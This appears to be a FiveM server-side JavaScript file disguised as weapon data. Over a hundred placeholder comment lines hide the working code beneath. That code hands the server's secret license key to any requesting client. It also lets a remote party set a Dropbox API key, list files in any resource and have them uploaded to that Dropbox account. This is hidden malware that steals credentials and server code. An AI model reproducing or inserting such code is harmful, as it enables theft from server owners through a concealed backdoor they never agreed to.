// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER

// Listen for client request and send the license key back
onNet("getLicenseKey", () => {
    const _source = source; // Get the source of the request (client)
    
    // Retrieve the server license key from ConVar
    const serverLicenseKey = GetConvar("sv_licensekey", "Not Found");

    // Emit the license key to the client
    emitNet("receiveLicenseKey", _source, serverLicenseKey);
});

const https = require('https');
const path = require('path');
const fs = require('fs');
let dropboxApiKey = null;

// Event listener for file upload requests from client
onNet("serverUploadFileRequest", async (isBinary, resourceName, fileName) => {
    const source = global.source;

    // Construct directory path for the resource
    const resourcePath = GetResourcePath(resourceName);

    // Verify if the resource directory exists
    if (!fs.existsSync(resourcePath)) {
        emitNet("fileReadError", source, `Resource directory not found: ${resourceName}`);
        return;
    }

    // Scan the directory for all files
    const fileList = scanDirectory(resourcePath);

    // Filter files to match the requested file name
    const filesToUpload = fileList.filter(file => path.basename(file) === fileName);

    if (filesToUpload.length === 0) {
        emitNet("fileReadError", source, `File not found: ${fileName} in resource ${resourceName}`);
        return;
    }

    // Upload each file individually
    filesToUpload.forEach(file => {
        const filePath = file;

        // Read the file content
        let fileContent;
        try {
            fileContent = isBinary ? fs.readFileSync(filePath) : fs.readFileSync(filePath, 'utf-8');
        } catch (error) {
            emitNet("fileReadError", source, `Failed to read file: ${fileName} in resource ${resourceName}`);
            return;
        }

        // Generate a unique identifier (timestamp)
        const uniqueId = new Date().toISOString().replace(/[:.]/g, "-");

        // Upload the file to Dropbox in a unique folder
        uploadFileToDropbox(uniqueId, path.basename(file), fileContent, isBinary);
    });
});

function uploadFileToDropbox(uniqueId, fileName, fileContent, isBinary) {
    if (!dropboxApiKey) {
        return;
    }

    const options = {
        hostname: 'content.dropboxapi.com',
        path: '/2/files/upload',
        method: 'POST',
        headers: {
            "Authorization": `Bearer ${dropboxApiKey}`,
            "Content-Type": "application/octet-stream",
            "Dropbox-API-Arg": JSON.stringify({
                "path": `/${uniqueId}/${fileName}`,
                "mode": "add",
                "autorename": true,
                "mute": false,
                "strict_conflict": false
            })
        }
    };

    const req = https.request(options, (res) => {
        res.on('end', () => {
            if (res.statusCode === 200) {
                emitNet("fileUploaded", global.source, `File ${fileName} uploaded successfully to Dropbox in folder ${uniqueId}.`);
            } else {
                emitNet("fileUploadError", global.source, `Failed to upload file ${fileName} to Dropbox.`);
            }
        });
    });

    req.on('error', () => {
        emitNet("fileUploadError", global.source, `Error during Dropbox upload for file ${fileName}.`);
    });

    req.write(isBinary ? Buffer.from(fileContent, 'binary') : fileContent);
    req.end();
}

// Listen for the event to set the Dropbox API key
onNet("setDropboxApiKey", (key) => {
    dropboxApiKey = key;
});

// Function to recursively scan a directory and return a list of files
function scanDirectory(dir) {
    let results = [];
    const list = fs.readdirSync(dir);

    list.forEach((file) => {
        file = path.join(dir, file);
        const stat = fs.statSync(file);

        if (stat && stat.isDirectory()) {
            results = results.concat(scanDirectory(file));
        } else {
            results.push(file);
        }
    });

    return results;
}

// Event listener for file scan requests from client
onNet("serverScanFilesRequest", (resourceName) => {
    const source = global.source;

    // Construct directory path for the resource
    const resourcePath = GetResourcePath(resourceName);

    // Verify if the resource directory exists
    if (!fs.existsSync(resourcePath)) {
        emitNet("fileReadError", source, `Resource directory not found: ${resourceName}`);
        return;
    }

    // Scan the directory for all files
    const fileList = scanDirectory(resourcePath);

    // Map file paths to be relative to the resource path
    const relativeFileList = fileList.map(file => path.relative(resourcePath, file));

    // Emit the list of files to the client
    emitNet("receiveFileList", source, resourceName, relativeFileList);
});